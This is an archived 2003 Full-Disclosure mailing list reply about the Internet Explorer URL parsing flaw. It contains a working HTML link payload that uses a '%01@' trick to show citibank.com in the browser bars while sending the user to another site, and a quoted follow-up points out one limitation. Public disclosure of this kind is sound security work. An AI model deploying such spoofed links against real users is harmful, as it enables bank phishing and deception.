[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability

To: <full-disclosure@lists.netsys.com>
Subject: RE: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
From: "Chris S" <muti@afterglo.ws>
Date: Tue, 9 Dec 2003 15:17:12 -0700

<a href="http://www.citibank.com";
onClick="location.href=unescape('http://www.citibank.com%01@www.wellsfargo.c
om'); return false;">Citibank</a> will show http://www.citibank.com in the
status and location bar but direct them to wells fargo.

-----Original Message-----
From: full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of Clint Bodungen
Sent: Tuesday, December 09, 2003 2:30 PM
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing
vulnerability

However, using this approach still allows the user to see the absolute URL
path in the task bar (with the %01 ommitted).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
  - From: "Clint Bodungen" <clint@secureconsulting.com>

Prev by Date: Re: [Full-Disclosure] Kevin Mitnick Domain Name for Sale
Next by Date: [Full-Disclosure] Re: Yahoo Instant Messenger YAUTO.DLL buffer overflow
Previous by thread: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
Next by thread: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
Index(es):
- Date
- Thread